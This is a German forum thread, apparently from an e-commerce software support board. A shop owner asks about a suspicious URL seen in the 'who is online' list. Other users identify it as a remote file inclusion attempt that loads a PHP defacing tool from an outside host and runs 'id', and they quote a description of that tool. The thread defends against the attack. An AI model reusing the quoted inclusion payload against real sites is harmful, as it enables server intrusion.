#1 (permalink)  
Alt 19.05.2007, 10:17
Benutzer
 
Registriert seit: 13.04.2006
Beiträge: 40
Standard Angriff ???

Seit einiger Zeit habe ich unter "Wer ist Online" immer eine komische IP Adressen:
Z.B:
200.163.252.11 http://www.muskelfood.de/index.php?manu=http://canaldrop.by.ru/cmd/tool25.txt?&cmd=id

Weiß jemand was das zu bedeuten hat?
Mache mir da einige Sorgen zwecks Angriff usw.
Wäre über Hilfe dankbar!
Gruß Mario

Geändert von muskelfood (19.05.2007 um 10:23 Uhr)
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #2 (permalink)  
Alt 19.05.2007, 15:43
Benutzerbild von fsit99
Erfahrener Benutzer
 
Registriert seit: 29.10.2006
Ort: BBG
Beiträge: 183
Standard

Zitat:
Zitat von muskelfood Beitrag anzeigen
Seit einiger Zeit habe ich unter "Wer ist Online" immer eine komische IP Adressen:
Z.B:
200.163.252.11 http://www.muskelfood.de/index.php?manu=http://canaldrop.by.ru/cmd/tool25.txt?&cmd=id

Weiß jemand was das zu bedeuten hat?
Mache mir da einige Sorgen zwecks Angriff usw.
Wäre über Hilfe dankbar!
Gruß Mario
Hallo
Ja da will einer code aus einer txt-datei bei dir im Web ausführen. Hast Du einen eigenen Server, dann solltest Du mal die Logfiles prüfen, ob er erfolgreich was einspeisen konnte. Wenn du ein Web hast, also Webspace gemietet, wird dein Hoster das prüfen und dem Angreifer aussperren.

Bei weiteren Fragen PM

mfg
oliver
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #3 (permalink)  
Alt 19.05.2007, 17:57
Erfahrener Benutzer
 
Registriert seit: 13.01.2007
Beiträge: 186
Standard

sollte man sich vieleicht auch sorgen machen wenn man täglich immer und immer wieder die gleiche IP sieht, allerdings nur artikel sich anschaut und sein warenkob, impressum etc....???

entweder kopiert er alles 1zu1 oder ist gerne auf mein shop... aber fragen kost ja nichts
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #4 (permalink)  
Alt 19.05.2007, 19:31
Benutzerbild von fsit99
Erfahrener Benutzer
 
Registriert seit: 29.10.2006
Ort: BBG
Beiträge: 183
Standard

Zitat:
Zitat von Sebastian05 Beitrag anzeigen
sollte man sich vieleicht auch sorgen machen wenn man täglich immer und immer wieder die gleiche IP sieht, allerdings nur artikel sich anschaut und sein warenkob, impressum etc....???

entweder kopiert er alles 1zu1 oder ist gerne auf mein shop... aber fragen kost ja nichts
Schon mal daran gedacht, das es eine Suchmaschine sein kann? Im oben genannten Beispiel ist es keine Suchmaschine, das steht fest.

mfg
oliver
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #5 (permalink)  
Alt 19.05.2007, 20:53
Erfahrener Benutzer
 
Registriert seit: 06.03.2007
Beiträge: 113
Standard

google spuckt das aus wenn man "tool25.txt" als Suchbegriff eingibt

Zitat:
"Defacing Tool 2.0 by r3v3ng4ns" is a suite of php based scripts that allows the attacker to send commands to the server primarily with the intent to deface web sites.". In our experience the script is often used to download further malware using wget/curl, or to test for the presence of vulnerable scripts by attempting commands such as 'id' or 'uname'. It seems that the script can also be uploaded to PHP/Apache servers to provide an easily accessible set of utilities for executing commands, searching for files.
Scheint also niemand zu sein, dem deine Seite gefällt..

der Frank
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
Antwort

Lesezeichen

Stichworte
angriff

Themen-Optionen
Ansicht

Forumregeln
Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are aus
Pingbacks are aus
Refbacks are aus


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
Möglicherweise Angriff? bernhard5624 Allgemeine Diskussionen 7 16.08.2006 19:47


Alle Zeitangaben in WEZ +1. Es ist jetzt 14:45 Uhr.

Copyright © 2011 xt:Commerce GmbH / xt:Commerce International Ltd. - All Rights Reserved

xt:Commerce is a SafeCharge brand